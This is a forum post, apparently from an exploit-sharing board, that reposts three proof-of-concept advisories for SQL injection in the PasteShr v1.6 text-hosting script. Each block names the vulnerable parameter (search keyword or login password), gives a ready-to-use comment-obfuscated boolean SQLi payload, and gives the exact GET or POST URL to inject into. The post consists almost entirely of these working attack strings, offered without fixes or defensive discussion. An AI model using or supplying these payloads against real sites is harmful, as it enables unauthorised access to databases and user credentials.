This CHT Posted November 4, 2022 Share Posted November 4, 2022 =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : password # Attack Pattern : /**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end) # POST Method : http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL Inject Here] =========================================================================================== ########################################################################################### =========================================================================================== # Exploit Title: PasteShr - SQL İnj. # Dork: N/A # Date: 14-05-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437 # Software Link: https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html # Version: v1.6 # Category: Webapps # Tested on: Wamp64, Windows # CVE: N/A # Software Description: Pasteshr is a script which allows you to store any text online for easy sharing. The idea behind the script is to make it more convenient for people to share large amounts of text online. =========================================================================================== # POC - SQLi # Parameters : keyword # Attack Pattern : %27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'=' # POST Method : http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here] =========================================================================================== Link to post Link to comment Share on other sites More sharing options...
Recommended Posts